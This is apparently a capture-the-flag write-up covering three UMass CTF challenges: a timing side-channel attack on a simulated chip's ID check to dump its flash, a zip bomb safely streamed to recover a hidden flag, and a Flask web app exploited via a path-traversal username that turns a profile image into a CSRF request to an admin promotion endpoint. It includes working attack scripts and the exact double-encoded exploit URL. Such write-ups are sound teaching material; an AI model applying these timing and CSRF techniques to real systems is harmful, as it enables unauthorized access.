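assert page_addrs[-1] == 0x0ED800
# The last page ends exactly on the last valid address.
assert page_addrs[-1] + PAGE - 1 == FLASH_END
```

So a full dump is 951 READ commands, and none of them touches an address outside the documented ranges.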

As far as I could tell this wasn’t referenced anywhere in the datasheet, but the challenge server returns a value labeled cycles along with the response data. It’s reasonable to assume that the intended way to solve the challenge is to get around the ID_AUTHENTICATION requirement, allowing us to dump the flash. With nothing else obvious to go on, I made an assumption: the “chip” might be using something like strcmp() to compare the password. This would be vulnerable to a timing attack, where the response takes longer the more leading bytes match. Normally this would be impractical to exploit remotely because of the noise introduced by the server being thousands of miles away, but the challenge server here very helpfully tells us the exact number of CPU cycles consumed, which makes it substantially easier. This is also hinted at by allowing us to control the clock speed. The values we’re allowed (8 and 16 MHz) would be far too fast to matter remotely, but if this were a real chip we were trying to break into in person, it might let us execute a real timing attack.
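
To illustrate the idea without touching the real server, here is a local simulation. Everything in it is an assumption: SimulatedChip is a hypothetical stand-in that compares the ID with an early exit and charges one cycle per compared character, and its cycle counter is cumulative. The real target's cycle costs are unknown to me beyond what the server reports.

```python
import random
import string

ALPHABET = string.ascii_uppercase
ID_LEN = 16


class SimulatedChip:
    """Hypothetical target: early-exit compare with a cumulative cycle counter."""

    def __init__(self, seed=None):
        rng = random.Random(seed)
        self._secret = "".join(rng.choice(ALPHABET) for _ in range(ID_LEN))
        self.cycles = 0
        self.attempts = 0

    def authenticate(self, guess):
        self.attempts += 1
        for a, b in zip(guess, self._secret):
            self.cycles += 1          # one cycle per compared character
            if a != b:
                return False          # early exit leaks the mismatch position
        return len(guess) == len(self._secret)


def crack(chip):
    """Recover the ID one position at a time from per-attempt cycle deltas."""
    known = ""
    for _ in range(ID_LEN):
        best_char, best_cost = None, -1
        for c in ALPHABET:
            guess = (known + c).ljust(ID_LEN, "A")
            before = chip.cycles
            if chip.authenticate(guess):
                return guess
            cost = chip.cycles - before   # delta, since the counter is cumulative
            if cost > best_cost:
                best_char, best_cost = c, cost
        known += best_char
    return known


chip = SimulatedChip(seed=7)
found = crack(chip)
assert found == chip._secret
assert chip.attempts <= len(ALPHABET) * ID_LEN
```

A wrong character at a given position always stops the comparison there, while the right one lets it run at least one character further, so the guess with the largest cycle delta is the correct one.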

From experimenting with it, the cycles number is cumulative, rather than being the cycle count for the most recent command. The first thing I did was define helper functions for communicating with the server. This was based on the datasheet, and was fairly self-explanatory. I was feeling lazy and this part was trivial, so I used an LLM to build most of it.

import asyncio, websockets, json, base64, struct, string
from enum import IntEnum
from typing import Dict, Any

URL = 'ws://hardware.ctf.umasscybersec.org:10004'
FLASH_END   = 0x0EDBFF
PAGE        = 0x400

class COMMANDS(IntEnum):
    UNKNOWN           = 0x00
    COMM_INIT         = 0x03
    SET_CHIP_FREQ     = 0x05
    ID_AUTHENTICATION = 0x34
    READ              = 0x69

class RESPONSES(IntEnum):
    ACK                     = 0x50
    INVALID_COMMAND         = 0x80
    FLOW_ERROR              = 0x81
    UNAUTHORIZED            = 0x82
    INVALID_FREQUENCY       = 0x83
    INVALID_ID_LEN          = 0x84
    INVALID_ADDRESS         = 0x87
    INVALID_ADDRESS_ALIGNMENT = 0x88

def unpack_packet(buf: bytes) -> Dict[str, Any]:
    head, length = struct.unpack_from('<BH', buf, 0)
    expected_total = 3 + length
    data = buf[3:expected_total]
    cmd_val, status_val = struct.unpack_from('<BB', data, 0)
    args = data[2:]
    try:
        cmd = COMMANDS(cmd_val)
    except ValueError:
        cmd = COMMANDS.UNKNOWN
    try:
        status = RESPONSES(status_val)
    except ValueError:
        status = None
    return {
        'HEAD': hex(head),
        'LEN': length,
        'CMD': cmd,
        'STATUS': status,
        'ARGS': args
    }

def b64(b): return base64.b64encode(b).decode()
def b64d(s): return base64.b64decode(s)

async def tx(ws, raw: bytes):
    await ws.send(json.dumps({'data': b64(raw)}))

async def rx(ws):
    rsp = json.loads(await ws.recv())
    return b64d(rsp['data']), rsp['cycles']

def pkt(cmd: int, args=b''):
    body = bytes([cmd]) + args
    return bytes([0x33]) + struct.pack('<H', len(body)) + body

async def handshake(ws):
    await tx(ws, bytes([0x55,0x00,0xC1,0x00]))
    data, cycles = await rx(ws)
    return data, cycles

async def comm_init(ws):
    await tx(ws, pkt(0x03))
    data, cycles = await rx(ws)
    return data, cycles

async def set_freq(ws, mhz=16):
    await tx(ws, pkt(0x05, struct.pack('<I', mhz*1_000_000)))
    data, cycles = await rx(ws)
    return data, cycles

async def auth(ws, guess: bytes):
    await tx(ws, pkt(0x34, guess)) 
    data, cycles = await rx(ws)
    status = data[4]
    return status,data, cycles

async def read_page(ws, addr):
    packet = pkt(0x69, struct.pack('<I', addr))
    await tx(ws, packet)
    data, _ = await rx(ws)
    packet = unpack_packet(data)
    return packet['ARGS']

async def dump_flash(ws):
    all_bytes = bytearray()
    addr = 0
    while addr <= FLASH_END:
        page = await read_page(ws, addr)
        all_bytes.extend(page)
        addr += PAGE
        print(f"dumped {hex(addr)} / {hex(FLASH_END)} ({len(page)})")
        with open("flash.bin", "wb") as f:
            f.write(all_bytes)

async def crack_password(ws, prev_cycles):
    ...

crack_password() is left as a stub for the time being. I also wrote a main function to orchestrate it once crack_password got implemented:

async def main():
    async with websockets.connect(URL) as ws:
        prev_cycles = 0
        _, cycles = await handshake(ws)
        prev_cycles = cycles
        _, cycles = await comm_init(ws)
        prev_cycles = cycles
        _, cycles = await set_freq(ws)
        prev_cycles = cycles
        secret_id = await crack_password(ws, prev_cycles)
        print(f"password found: {secret_id.decode()}")
        await dump_flash(ws)

asyncio.run(main())

This follows the order defined in the datasheet: the handshake to put the chip into programming mode, the init packet, the frequency packet, the password, and then the commands to read flash.
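To make the framing concrete, here is a minimal sketch of what the request packets in that sequence look like on the wire. It mirrors the pkt() helper above (0x33 header, little-endian length, then the command byte and arguments); build_packet and describe are names made up for this illustration, and the READ address is just an example value.

```python
import struct

HEAD = 0x33  # header byte, same value pkt() uses above

def build_packet(cmd: int, args: bytes = b"") -> bytes:
    """Frame a request like pkt(): HEAD, little-endian body length, body."""
    body = bytes([cmd]) + args
    return bytes([HEAD]) + struct.pack("<H", len(body)) + body

def describe(packet: bytes) -> dict:
    """Split a request packet back into its fields (hypothetical helper)."""
    head, length = struct.unpack_from("<BH", packet, 0)
    body = packet[3:3 + length]
    return {"head": head, "length": length, "cmd": body[0], "args": body[1:]}

init_pkt = build_packet(0x03)                                     # COMM_INIT
freq_pkt = build_packet(0x05, struct.pack("<I", 16 * 1_000_000))  # SET_CHIP_FREQ, 16 MHz
read_pkt = build_packet(0x69, struct.pack("<I", 0x400))           # READ, example address

for name, p in [("COMM_INIT", init_pkt), ("SET_CHIP_FREQ", freq_pkt), ("READ", read_pkt)]:
    print(f"{name:14s} {p.hex(' ')}")
```

Responses carry one extra status byte after the command byte, which is why unpack_packet() reads two bytes before the arguments.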

Initially I used a fresh socket connection for every crack attempt, but I quickly realized that the password changes on every connection, so I shouldn’t do that. With only ASCII A-Z in the character set and knowing the password is 16 bytes, the timing attack should only require 416 attempts at most. My code is, as always, fairly scuffed, but this is what I managed to make work for implementing the attack:

async def crack_password(ws, prev_cycles):
    known = b''
    for pos in range(16):
        best, best_cycles = None, -1
        for ch in string.ascii_uppercase:
            # Pad the guess to 16 bytes so only the byte at `pos` varies.
            guess = known + ch.encode() + b'\x00'*(15-pos)
            status, data, cycles = await auth(ws, guess)
            # The reported count is cumulative, so diff against the last reading.
            op_cycles = cycles - prev_cycles
            prev_cycles = cycles
            print("auth:", unpack_packet(data), op_cycles, status)
            if op_cycles > best_cycles:
                best_cycles, best = op_cycles, ch
            if status == RESPONSES.ACK:  # 0x50, the whole ID matched
                return guess
        known += best.encode()
        print(f"found byte {pos}: {best} (cycles={best_cycles})")
    return known

For each position, it figures out which next letter takes the most time to check. There should be one that takes longer than the rest, and this identifies it as the correct letter.
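The idea can be tried offline against a toy model. The sketch below assumes the chip compares the ID byte by byte and bails out at the first mismatch, which is what the timing suggested; FakeChip, its cycle costs, and the secret are all invented for the simulation and say nothing about the real firmware.

```python
import string

SECRET = b"SIDECHANNELSRULE"  # made-up 16-byte A-Z secret for the simulation

class FakeChip:
    """Toy model: an early-exit compare whose cost leaks the match length."""
    def __init__(self, secret: bytes):
        self.secret = secret
        self.cycles = 0  # cumulative, like the counter the server reports

    def auth(self, guess: bytes):
        self.cycles += 100  # fixed per-command overhead (arbitrary)
        ok = True
        for a, b in zip(guess, self.secret):
            self.cycles += 5  # cost of comparing one byte (arbitrary)
            if a != b:
                ok = False
                break
        return ok, self.cycles

def recover(chip, length=16):
    known, prev, attempts = b"", chip.cycles, 0
    for pos in range(length):
        best, best_delta = None, -1
        for ch in string.ascii_uppercase.encode():
            guess = known + bytes([ch]) + b"\x00" * (length - pos - 1)
            ok, total = chip.auth(guess)
            attempts += 1
            delta, prev = total - prev, total  # per-command cost from the running total
            if ok:
                return guess, attempts
            if delta > best_delta:
                best, best_delta = ch, delta
        known += bytes([best])
    return known, attempts

recovered, attempts = recover(FakeChip(SECRET))
print(recovered, attempts)
```

The attempt count stays at or below 26 * 16 = 416, compared with 26^16 candidates for a blind brute force.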

When it came to dumping the flash, initially I tried starting from 0x370 like the datasheet suggests, but got INVALID_ADDRESS_ALIGNMENT as a response. Presumably the bytes between 0x370 and 0x400 are important, so I tried starting from 0x0 instead. The datasheet says

As stated before, the bootrom and other secure assets cannot be read out, only user area

so I assumed this wouldn’t work, but it did, so I just ran with it. Running my script gave me a flash.bin that was 962560 bytes long, which was exactly what I expected. Looking at the raw bytes of the file, I could see a lot of ASCII text in what seemed to be markdown and C source code, as well as a lot of non-ASCII bytes with some associated PNG markers (PNG, IHDR, and IEND). At first I tried carving the image bytes out myself in a hex editor, but I did something wrong and they came out corrupted. I then realized I should just binwalk the file to see what it was really supposed to be, which gave me my answer pretty clearly:

binwalking flash.bin, showing a tar archive

The identified tar archive started at 0x371, which is one byte after the alleged start of the flash space. Running binwalk again with the -e flag extracted the contents:

tree of the extracted tar archive
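For anyone without binwalk at hand, a rough equivalent for this particular case can be sketched with the standard library. It relies on the "ustar" magic that sits 257 bytes into a POSIX tar header; find_tar_offsets is a hypothetical helper, the dump here is a synthetic stand-in rather than the real flash.bin, and this is not a description of how binwalk itself works.

```python
import io
import tarfile

def find_tar_offsets(blob: bytes):
    """Return offsets where a tar header plausibly starts.

    The "ustar" magic lives at byte 257 of a header, so a hit at index i
    suggests an archive beginning at i - 257.
    """
    offsets = []
    i = blob.find(b"ustar")
    while i != -1:
        if i >= 257:
            offsets.append(i - 257)
        i = blob.find(b"ustar", i + 1)
    return offsets

# Synthetic "flash dump": 0x371 bytes of padding followed by a small tar.
buf = io.BytesIO()
with tarfile.open(fileobj=buf, mode="w", format=tarfile.USTAR_FORMAT) as tf:
    payload = b"hello from flash\n"
    info = tarfile.TarInfo("firmware/readme.txt")
    info.size = len(payload)
    tf.addfile(info, io.BytesIO(payload))
fake_dump = b"\xff" * 0x371 + buf.getvalue()

start = find_tar_offsets(fake_dump)[0]
with tarfile.open(fileobj=io.BytesIO(fake_dump[start:])) as tf:
    names = tf.getnames()
print(hex(start), names)
```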

frames.xz being another archive explained why just carving out the bytes gave something corrupted. Extracting it properly with tar -xvf _flash.bin.extracted/firmware/frames.xz left me with four images:

extracted frames

Three of the four images appeared to just be random memes, but frame-2.png had the flag drawn on it:

frame with the flag

The flag was UMASS{un(_b3_w1l1n_w1th_s1d3ch4nn3l1n_XT60WWSC}

Pandora

I found this challenge pretty silly and enjoyable. It’s the sort of random misc thing that’s fun and novel, and made me think about how to approach it. The challenge description was

Surprise, surprise! Note: The file can be considered malicious. Handle with care.

and there was a single attachment, pandora.zip, which was about 11MB in size.

Inspecting the zip file showed immediately what was up. There was another zip file inside it called archive.zip, and inside that I found this:

zip bomb

Their packed sizes differed quite a bit, but each of the 42 files inside the archive would extract to about 275 gigabytes. This was a zip bomb. Looking at the raw bytes of archive.zip, I could pretty clearly see where the real data in each chunk stopped and where the bomb started.

repeating data
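The size mismatch can be checked without extracting anything, since the zip central directory records both sizes. This is a small sketch on a synthetic archive (a short text followed by 1 MiB of zero bytes) rather than the real archive.zip; size_report is a name made up for the example, and the sizes are whatever the archive metadata claims.

```python
import io
import zipfile

def size_report(source):
    """List (name, compressed size, uncompressed size) from the zip metadata."""
    with zipfile.ZipFile(source) as zf:
        return [(i.filename, i.compress_size, i.file_size) for i in zf.infolist()]

# Tiny stand-in archive: real text followed by highly compressible padding.
buf = io.BytesIO()
with zipfile.ZipFile(buf, "w", compression=zipfile.ZIP_DEFLATED) as zf:
    zf.writestr("book.txt", b"Some real text.\n" + b"\x00" * (1 << 20))

report = size_report(io.BytesIO(buf.getvalue()))
for name, packed, unpacked in report:
    print(f"{name}: {packed} bytes packed -> {unpacked} bytes unpacked "
          f"(ratio {unpacked / packed:.0f}x)")
```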

It seemed like these would extract to some repeating nonsense. The important parts of the files seemed to be at the start. I started extracting the first one and then stopped it nearly immediately, and the partially extracted file started with

The Project Gutenberg eBook of The Complete Works of William Shakespeare
    
This ebook is for the use of anyone anywhere in the United States and
most other parts of the world at no cost and with almost no restrictions
whatsoever. You may copy it, give it away or re-use it under the terms
of the Project Gutenberg License included with this ebook or online
at www.gutenberg.org. If you are not located in the United States,
you will have to check the laws of the country where you are located
before using this eBook.

It’s reasonable to assume from here that each of the 42 files contains the text of at least one book, and that the flag is hidden somewhere in one of them. I could repeat what I did with the first file for all the rest of them (start the extraction, wait a second, copy the partial file, and then stop the extraction), but that process was rather tedious and I didn’t want to do it for 42 files. Instead, I wrote a script that did it for me:

import os
import zipfile

chunk_size = 16
os.makedirs("extracted", exist_ok=True)  # the output folder has to exist
with zipfile.ZipFile("archive.zip", 'r') as zf:
    for i, info in enumerate(zf.infolist()):
        print(f"Scanning {info.filename!r} …")
        offset = 0
        dat = []
        with zf.open(info, 'r') as stream:
            while True:
                # read() returns up to chunk_size bytes of decompressed data
                chunk = stream.read(chunk_size)
                if not chunk:
                    break
                idx = chunk.find(b'\x00')
                if idx != -1:
                    print(f"null byte at uncompressed offset {offset + idx}")
                    # keep the text before the padding, then stop
                    dat.append(chunk[:idx])
                    break
                offset += len(chunk)
                dat.append(chunk)
        with open(f"extracted/{i}.txt", 'wb') as f:
            f.write(b''.join(dat))

This extracts every file from inside the zip archive, 16 decompressed bytes at a time, and stops each one as soon as it finds a null byte. The expected plaintexts are all e-books, which it’s reasonable to expect wouldn’t normally contain a null byte. It took a while for this to run, because it still (somehow) took a hot second to decompress each chunk of up to 16 bytes. After a minute or two, I had a folder with the texts from 42 books in it. The obvious thing to do from here was to just grep for the flag format, which I tried, and it worked immediately.

grepping for the flag
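The streaming approach can be exercised safely on a synthetic archive. The sketch below is a variant of the script, not the exact code I ran: read_until_null is a hypothetical helper, it uses a larger chunk size, and it adds a byte limit as a safety net in case a member never contains a null byte. It assumes, as the script does, that the padding is made of null bytes.

```python
import io
import zipfile

def read_until_null(zf, info, chunk_size=4096, limit=64 * 1024 * 1024):
    """Stream one member and stop at the first null byte (or near `limit` bytes)."""
    out = bytearray()
    with zf.open(info) as stream:
        while len(out) < limit:
            chunk = stream.read(chunk_size)  # decompressed bytes, at most chunk_size
            if not chunk:
                break
            idx = chunk.find(b"\x00")
            if idx != -1:
                out += chunk[:idx]  # keep the text before the padding
                break
            out += chunk
    return bytes(out)

# Stand-in for one bomb member: real text followed by a run of null bytes.
text = b"To be, or not to be, that is the question.\n" * 300
buf = io.BytesIO()
with zipfile.ZipFile(buf, "w", compression=zipfile.ZIP_DEFLATED) as zf:
    zf.writestr("0", text + b"\x00" * (4 << 20))

with zipfile.ZipFile(io.BytesIO(buf.getvalue())) as zf:
    recovered = read_until_null(zf, zf.infolist()[0])
print(len(recovered), recovered == text)
```

Because the member is read as a stream, the padding after the first null byte is never fully decompressed or written to disk.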

I submitted UMASS{That script, it's got life in it. Working, it is. No doubt.} as the flag, and it was correct.

Flash Game Studio

The web category for this event was pretty solid overall. I solved all five of the challenges and they were all interesting in their own right, but I found this one the most unique and deserving of a writeup. The description reads

I created a really cool game editor for your browser, but I’m still working on it so you can only sign up for now.

and there were two attachments: chall.zip and CONNECTION-INSTRUCTIONS.txt.

The extracted handout defined two Docker containers, a Flask app and a Postgres database:

services: 
  app:
    ports:
      - 80:80
    volumes: 
      - ./uploads:/app/users
    build: app
    environment: 
      POSTGRES_PASSWORD: test
      APP_SECRET: test
      POSTGRES_HOST: db
    restart: always
  db:
    image: postgres
    environment: 
      POSTGRES_PASSWORD: test
    volumes:
      - ./db/init.sql:/docker-entrypoint-initdb.d/init.sql
    restart: always

The Dockerfile for the Flask app looked like this

FROM python:slim
RUN pip3 install flask[async] RestrictedPython psycopg2-binary selenium
RUN apt-get update
RUN apt-get install -y wget
RUN wget -q https://dl.google.com/linux/direct/google-chrome-stable_current_amd64.deb 
RUN apt-get install -y ./google-chrome-stable_current_amd64.deb
WORKDIR /app
COPY app .
RUN chmod +x entrypoint.sh
ENTRYPOINT "/app/entrypoint.sh"

and the init.sql for the database contained the following:

CREATE DATABASE flashgamestudio;
\c flashgamestudio;

CREATE EXTENSION IF NOT EXISTS "uuid-ossp";

CREATE TABLE users (
    uid varchar(255)  UNIQUE NOT NULL,
    username varchar(255) PRIMARY KEY,
    password varchar(255) NOT NULL,
    user_desc text NOT NULL,
    role_id smallint NOT NULL
);

CREATE TABLE games (
    code text NOT NULL,
    game_name varchar(255) NOT NULL,
    game_desc varchar(255) NOT NULL,
    username varchar(255) REFERENCES users
);

INSERT INTO users VALUES(
    uuid_generate_v4(),
    'admin',
    'test',
    'i am the admin',
    3
);

INSERT INTO games VALUES(
    'UMASS{FLAG_FOR_TESTING}',
    'best game ever',
    'the best game ever',
    'admin'
);

Spinning up the application and visiting it in a browser, I was met with a standard login/register page. I made an account and signed in, and was greeted with this page

not a developer

I clicked on the link to request access to the early access dev program, and after a few seconds of loading saw a blank page with the content Admin visited your profile but probably denied you!. Okay, so this is an admin bot challenge, presumably with XSS. The next step was to check out our profile page and see what’s up

user profile

It shows us our username, description, ID, profile picture, and gives us an option to update our description. There’s no clear way to change our profile picture, which leaves two potential XSS targets - username and description. With the initial exploration out of the way, the next thing to do was to properly inspect the source code.

db.py seems to provide a class for simple database operations.

import psycopg2
import os
from server_helpers import ROLE_USER, ROLE_DEV

class DatabaseHelper:
    def __init__(self):
        self.conn = psycopg2.connect(database="flashgamestudio",
            host=os.environ["POSTGRES_HOST"],
            user="postgres",
            password=os.environ["POSTGRES_PASSWORD"])
    
    def reset_conn(self):
        del self.conn
        self.conn = psycopg2.connect(database="flashgamestudio",
            host=os.environ["POSTGRES_HOST"],
            user="postgres",
            password=os.environ["POSTGRES_PASSWORD"])
        
    def getUsers(self):
        cur = self.conn.cursor()
        cur.execute("SELECT * FROM users;")
        return cur.fetchall()
    
    def loginUser(self,username,password):
        cur = self.conn.cursor()
        cur.execute("SELECT username,role_id,uid FROM users WHERE username=%s AND password=%s",(username,password))
        user = cur.fetchone()
        cur.close()
        return user
    
    def promoteUser(self,uid):
        cur = self.conn.cursor()
        try:
            cur.execute("UPDATE users SET role_id=%s WHERE uid=%s;",(ROLE_DEV,uid))
            self.conn.commit()
            cur.close()
        except:
            self.reset_conn()

    def updateUserDesc(self,username,user_desc):
        cur = self.conn.cursor()
        try:
            cur.execute("UPDATE users SET user_desc=%s WHERE username=%s;",(user_desc,username))
            self.conn.commit()
            cur.close()
        except:
            self.reset_conn()

    def registerUser(self,username,password,user_desc):
        cur = self.conn.cursor()
        try:
            cur.execute("INSERT INTO USERS VALUES(uuid_generate_v4(),%s,%s,%s,%s);",(username,password,user_desc,ROLE_USER))
            self.conn.commit()
            cur.close()
        except:
            self.reset_conn()

    def getUser(self, username):
        cur = self.conn.cursor()
        cur.execute("SELECT username,user_desc,uid FROM users WHERE username=%s",(username,))
        user = cur.fetchone()
        cur.close()
        return user
    
    def getGames(self,username):
        cur = self.conn.cursor()
        cur.execute("SELECT game_name,game_desc,code FROM games WHERE username=%s",(username,))
        games = cur.fetchall()
        cur.close()
        return games
    
    def getGame(self,username,game_name):
        cur = self.conn.cursor()
        cur.execute("SELECT game_name,code FROM games WHERE username=%s AND game_name=%s",(username,game_name))
        game = cur.fetchone()
        cur.close()
        return game
    
    def createGame(self,game_name,game_code,game_desc,username):
        cur = self.conn.cursor()
        try:
            cur.execute("INSERT INTO games VALUES(%s,%s,%s,%s);",(game_code,game_name,game_desc,username))
            self.conn.commit()
            cur.close()
        except:
            self.reset_conn()

While I think it’s possible to make some operations fail with a race condition while the connection is resetting, it wouldn’t help us. Other than that, everything here seems secure. Every query passes its values separately through psycopg2’s parameterized queries instead of building SQL strings by hand, so SQL injection is off the table. app.py shows us a handful of routes:

@app.route("/")
def index():
    return render_template('index.html')

@app.get("/login")
def login_get():
    return render_template('login.html')

@app.post("/login")
def login_post():
    username = request.form.get('username', None)
    password = request.form.get('password', None)
    if(type(username) == str and type(password) == str):
        result = database_helper.loginUser(username,password)
        if(result != None and result[0] == username):
            user, role, uid = result
            session['username'] = user
            session['role'] = role
            session['uid'] = uid
            return redirect("/dev")
        return redirect("/login?message=Error:+Incorrect+Username+or+Password!")
    return redirect("/login?message=Error:+Malformed+Username+or+Password!")

@app.get("/register")
def register_get():
    return render_template('register.html')

@app.post("/register")
def register_post():
    ...

@app.route('/logout')
def logout():
    session.pop('username', None)
    return redirect("/")

@app.get("/dev")
def dev_get():
    if('role' in session and 'username' in session):
        if(session['role'] == 2):
            games = database_helper.getGames(session['username'])
            return render_template('dev.html',games=games,username=session['username'])
        return render_template('dev.html',err="You are not a dev!",username=session['username'])
    return redirect("/login")

@app.get("/profile")
def profile_user_get():
    username = request.args.get('username',None)
    if('username' in session):
        if(username==None):
            return redirect(f'/profile?username={session["username"]}')
        if(session['username']==username or session['username']=='admin'):
            username,user_desc, uid = database_helper.getUser(username)
            return render_template('profile.html',username=username,user_desc=user_desc,uid=uid)
    return redirect("/login")

@app.post("/create_game")
def create_game():
    if('role' in session and session['role']==2):
        game_name = request.form.get('game_name', None)
        game_desc = request.form.get('game_desc', "")
        if(game_name==None):
            return "You must provide a game name",400
        code = FlashGameHelper.gen_game_from_template(game_name)
        database_helper.createGame(game_name,code,game_desc,session['username'])
        return redirect('/dev?message=Created+game+successfully!')
    return "You are not a dev!",403

@app.route("/request_access/<username>")
def request_access(username):
    visit_profile(username)
    return "Admin visited your profile but probably denied you!"

@app.route("/admit/<uid>")
def admit_user(uid):
    if('username' in session and 'role' in session):
        if(session['role'] == 3):
            database_helper.promoteUser(uid)
            return "Accepted.",200
        return "Only admin can accept people to the program.",403
    print("not authed")
    return "Unauthorized.",403

@app.route("/user/profile_pic/<username>")
def get_profile_pic(username):
    if('username' in session and session['username']==username):
        _, _, uid = database_helper.getUser(username)
        return send_from_directory('users', f'{uid}.jpg')
    return "Unauthorized.",403

@app.route("/game/<username>/<game_name>")
def get_dev_game(username,game_name):
    if('username' in session and session['username']==username):
        game_name, code = database_helper.getGame(username,game_name)
        return render_template("game.html",username=username,code=code,game_name=game_name)
    return "Unauthorized.",403

@app.route("/game/<username>/<game_name>/edit")
def edit_game(username,game_name):
    if('username' in session and session['username']==username):
        return "Editing is not supported right now.",501
    return "Unauthorized.",403

@app.route("/game/<username>/<game_name>/test")
def test_game(username,game_name):
    if('username' in session and session['username']==username):
        game_name, code = database_helper.getGame(username,game_name)
        return FlashGameHelper.test_game(code,game_name), 200
    return "Unauthorized.",403

@app.post("/profile/update")
def update_user():
    if('username' in session):
        user_desc = request.form.get('about_me', "")
        database_helper.updateUserDesc(session['username'],user_desc)
        return redirect("/profile")
    return "Unauthorized.",403

I truncated the register endpoint for brevity, but it does exactly what one would expect. It notably doesn’t let someone register a username that already exists. The admin bot in bot.py is also fairly straightforward:

def visit_profile(username):
    options = webdriver.ChromeOptions()
    options.add_argument("no-sandbox")
    options.add_argument("headless")
    options.add_argument("disable-gpu")
    driver = webdriver.Chrome(options=options)
    # Create admin flask session manually
    si = SecureCookieSessionInterface()
    app = MockApp()
    s = si.get_signing_serializer(app)
    ADMIN_COOKIE = s.dumps({'username':'admin','role':3})
    driver.get("http://localhost")
    driver.add_cookie({"name": "session", "value": ADMIN_COOKIE})
    driver.get(f"http://localhost/profile?username={username}")
    # Access requests via the `requests` attribute
    sleep(3)
    driver.close()

It visits our profile, that’s about it. One of the first things I checked was the jinja templates to see if anything was using |safe or something else that would make XSS obvious, and nothing was. The profile.html template contained the following:

{% extends 'base.html' %}

{% block header %}
{% endblock %}

{% block content %}
<div class="container">
    <h1>Hello {{username}}, your UID is {{uid}}</h1>
    <h2>About Me</h2>
    <p>
        {{user_desc}} 
    </p>
    <h3>My Portrait</h3>
    <img class="portrait" src="/user/profile_pic/{{username}}" height="150px"><br>

    <form class="game_form" id="profile_form" action="/profile/update" method="POST">
        <h3>Update Profile</h3>
        <label for="about_me">Update about me: </label><br>
        <textarea type="text" id="about_me" name="about_me" placeholder="Sample description"></textarea><br>
        <img  onclick="profile_form.submit()" onmouseout="this.src=`/static/profile_button.png`" onmouseover="this.src=`/static/profile_button_hover.png`" width="200px" src="/static/profile_button.png"><br>
    </form> 
</div>
{% endblock %}

and as per app.py, it gets rendered like this

@app.get("/profile")
def profile_user_get():
    username = request.args.get('username',None)
    if('username' in session):
        if(username==None):
            return redirect(f'/profile?username={session["username"]}')
        if(session['username']==username or session['username']=='admin'):
            username,user_desc, uid = database_helper.getUser(username)
            return render_template('profile.html',username=username,user_desc=user_desc,uid=uid)
    return redirect("/login")

There isn’t any XSS here, but there does seem to be a CSRF. It renders

<img class="portrait" src="/user/profile_pic/{{username}}" height="150px">

and the value of username isn’t sanitized at all, beyond verifying that it exists in the database (because the tuple unpack will throw an error if it doesn’t). We can’t break out of the quotes, but we can control where the source URL points relative to the site’s base URL. One other thing to note is that in several places, the Flask application uses app.route without specifying a method, instead of the standard app.post, for routes that can modify state. This is important because when the browser renders the <img>, it makes a GET request to the src in question. The clear target here is the /admit endpoint.

@app.route("/admit/<uid>")
def admit_user(uid):
    if('username' in session and 'role' in session):
        if(session['role'] == 3):
            print(f"promoted {uid}")
            database_helper.promoteUser(uid)
            return "Accepted.",200
        print("not promoted")
        return "Only admin can accept people to the program.",403
    print("not authed")
    return "Unauthorized.",403

If we can make the src attribute effectively point to /admit/<our UID>, we can promote our standard account to a “developer” account. The way to do this is path traversal. If we can make username something like ../../admit/<uid>, then when the browser requests /user/profile_pic/../../admit/<uid>, the path will automatically get reduced to /admit/<uid>. There is a slight problem here in that the /request_access endpoint takes the target username as a path parameter, not a query string one.
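The path reduction can be previewed with urljoin, which applies the standard dot-segment removal when resolving a reference against a base URL. I'm assuming the browser resolves this src the same way; the UID and page URL below are placeholders, and resolved_img_url is a name made up for the example.

```python
from urllib.parse import urljoin

PAGE_URL = "http://localhost/profile?username=x"  # page the bot has open (placeholder query)
UID = "00000000-0000-0000-0000-000000000000"      # placeholder UID

def resolved_img_url(username: str) -> str:
    """Resolve the <img src> the profile template would emit for a username."""
    src = f"/user/profile_pic/{username}"
    return urljoin(PAGE_URL, src)

normal = resolved_img_url("alice")
traversal = resolved_img_url(f"../../admit/{UID}")
print(normal)
print(traversal)
```

The second URL lands on /admit/<uid>, and since the bot's browser carries the admin session cookie, the GET request is made with admin privileges.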

Our account’s UID is 465364f1-ceed-45d1-b330-0029894e1149. We can make a second account with the username ../../admit/465364f1-ceed-45d1-b330-0029894e1149. The /request_access endpoint is unauthenticated, so we can make requests to it easily using cURL. If we make a request directly to http://localhost/request_access/../../admit/465364f1-ceed-45d1-b330-0029894e1149, Flask logs show us that the server saw this:

192.168.16.1 - - [23/Apr/2025 01:13:35] "GET /admit/465364f1-ceed-45d1-b330-0029894e1149 HTTP/1.1" 403

Clearly the ../ were parsed beforehand, and changed the request path. If I add --path-as-is to my cURL command, it shows this instead:

192.168.16.1 - - [23/Apr/2025 01:14:40] "GET /request_access/../../admit/465364f1-ceed-45d1-b330-0029894e1149 HTTP/1.1" 404 -

This is better, but still doesn’t work because the / characters in the URL are parsed as path delimiters, so it doesn’t match the route /request_access/<username>. It’s possible to resolve this issue by double URL-encoding the username. Werkzeug decodes the first layer before routing, which leaves a single path segment with no literal slashes in it, and the second layer gets decoded when the bot requests /profile?username=..., so the profile lookup still ends up with the proper username. Making a request to http://localhost/request_access/%252E%252E%252F%252E%252E%252Fadmit%252F465364f1%252Dceed%252D45d1%252Db330%252D0029894e1149 promotes our account exactly as expected.
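The two decoding layers can be traced with urllib. This sketch assumes the request path is decoded once before routing and the bot's /profile query string is decoded once more. Note that quote() leaves dots and dashes alone, so the result is shorter than the URL I actually used; it decodes to the same username, but I only tested the fully encoded form against the challenge.

```python
from urllib.parse import quote, unquote

UID = "465364f1-ceed-45d1-b330-0029894e1149"
username = f"../../admit/{UID}"

once = quote(username, safe="")   # "/" becomes %2F
twice = quote(once, safe="")      # "%" becomes %25, so %2F becomes %252F
url = f"http://localhost/request_access/{twice}"

after_route = unquote(twice)        # what the route parameter holds after one decode
after_query = unquote(after_route)  # what /profile sees after the second decode

print(url)
print(after_route)
print(after_query)
```

The key property is that after_route contains no literal slash, so it still matches a single <username> path segment, while after_query is the full traversal string.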

Logging back into the now-developer account shows us the unlocked dev dashboard, which has a form for “creating a new game”. I made a game with a random name and description to see what would happen.

dev dashboard with one created game

Clicking on the link shows us another page with what looks to be some Python source code, and a link to “test” the game.

game details

It’s notable that if this code were to run, it would result in a loop that hangs forever. Clicking “test game” shows an otherwise blank page with the text Game failed during testing.. The FlashTemplater.py source file contains this code:

import ast
from RestrictedPython import compile_restricted
from base64 import b64encode, b64decode

GAME_TEMPLATE = """class GameName:
    def __init__(self):
        self.board = []
        self.gameover = False
        self.player1, self.player2, self.state = {},{},{'gameover':False}

    def play(self):
        while(True):
